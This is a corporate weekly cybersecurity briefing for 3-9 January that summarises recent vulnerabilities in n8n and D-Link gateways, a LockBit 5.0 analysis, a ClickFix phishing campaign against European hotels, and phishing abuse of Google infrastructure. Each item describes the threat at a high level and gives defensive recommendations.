Hybrid Cloud
Cyber Security & NaaS
AI & Data
IoT & Connectivity
Business Applications
Intelligent Workplace
Consulting & Professional Services
Small Medium Enterprise
Health and Social Care
Industry
Retail
Tourism and Leisure
Transport & Logistics
Energy & Utilities
Banking and Finance
Sports
Smart Cities
Cyber Security Weekly Briefing, 3-9 January
Ni8mare: RCE vulnerability with CVSSv3 10.0 in n8n automation platform
Cyera researchers have identified a maximum severity remote code execution (RCE) vulnerability (CVSSv3 10.0), listed as CVE-2026-21858, in the n8n workflow automation tool. The flaw, nicknamed Ni8mare, allows unauthenticated attackers to take full control of the server by injecting commands into specific node execution processes.
This weakness lies in insufficient validation of user input, and successful exploitation grants complete control over the n8n instance, with a direct impact on the confidentiality, integrity, and availability of automation flows and managed credentials. Given the integration of this platform with databases and corporate credentials, server compromise implies a systemic risk of data exfiltration. Organizations are urged to update to patch versions released by the manufacturer and restrict access to the management interface.
D-Link warns of active exploitation of CVE-2026-0625, critical command injection vulnerability
D-Link has confirmed, following a report from security firm VulnCheck, a critical unauthenticated command injection vulnerability tracked as CVE-2026-0625 (CVSSv3 9.3 according to VulnCheck) affecting several legacy DSL gateway models (DSL-526B ≤ 2.01, DSL-2640B ≤ 1.07, DSL-2740R < 1.17, DSL-2780B ≤ 1.01.14). The problem is due to insufficient input sanitization in the dnscfg.cgi CGI endpoint, allowing remote attackers to inject and execute arbitrary shell commands with serious confidentiality, integrity and availability impact.
These devices are end-of-life/end-of-service with no patches available, so D-Link urges owners to retire or replace them with supported equipment or isolate them in non-critical networks. Although no public proof-of-concept exploit has been widely published, active exploitation by unnamed threat actors has been observed.
LockBit 5.0: Technical analysis of the new version of the ransomware
AhnLab has published an in-depth analysis of LockBit 5.0, the most recent evolution of this ransomware family. Iteration 5.0 features significant evolutions in its evasion capabilities and encryption techniques. This release employs hybrid cryptographic algorithms to accelerate the compromise of large volumes of data and uses code obfuscation techniques to make it difficult for traditional EDR and antivirus solutions to analyze. LockBit 5.0 maintains its Ransomware-as-a-Service (RaaS) model, making it easier to adopt by affiliates with varying levels of experience.
It also incorporates new functionalities for automated data exfiltration and selective deletion of shadow backups. In addition, it uses custom scripts to disable system defenses and ensure persistence by manipulating the Windows registry. Recommended countermeasures include network segmentation, the use of multi-factor authentication (MFA), and active monitoring of anomalous encryption processes.
PHALT#BLYX: ClickFix campaign against the hospitality sector in Europe
Securonix has identified a sophisticated cyberattack campaign dubbed PHALT#BLYX, attributed to Russian threat actors, which primarily targets the hospitality sector, especially in countries in Europe. Malicious activity begins with phishing emails that impersonate Booking.com, using high-charge reservation cancellation baits to redirect victims to fraudulent websites. Once there, the social engineering technique CickFix is used, where a false blue screen (BSOD) and a CAPTCHA error are shown to trick the user into manually pasting and executing a PowerShell command in the Windows Run dialog.
The impact of this attack allows attackers to evade defenses by using legitimate tools such as MSBuild.exe to compile and execute the final payload, a highly obfuscated version of DCRat. This malware provides full remote access (RAT), system persistence, keylogging capability, and the ability to deploy secondary payloads after disabling Windows Defender. Training employees against ClickFix tactics and monitoring for anomalous executions of development tools such as MSBuild is recommended.
Abuse of Google infrastructure for highly evasive phishing campaigns
RavenMail has published an article describing a campaign to abuse legitimate functionalities of Google's infrastructure, such as Google Cloud Application Integration and associated services, to send phishing emails from real Google addresses that pass all authentication validations (SPF, DKIM, DMARC) without the need to spoof domains or compromise servers. The links pointed to Google Cloud Storage (storage.cloud.google.com), then redirected to googleusercontent.com to display a fake CAPTCHA, and finally led to a fake Microsoft login page on a malicious domain to steal credentials.
In December 2025, the campaign targeted more than 3000 organizations, mainly in the manufacturing sector, but also in technology and finance, with almost 9400 emails sent. This attack underscores the need to strengthen email security with context-based detection, not just reputation, and to educate users to identify emails with unforeseen urgencies, deceptive redirects, and messages that use legitimate services unexpectedly.
◾ This newsletter is one of the deliverables of our Operational and Strategic Intelligence service. If you are interested in knowing the rest of the Operational and Strategic Intelligence contents included in the service, please contact us →
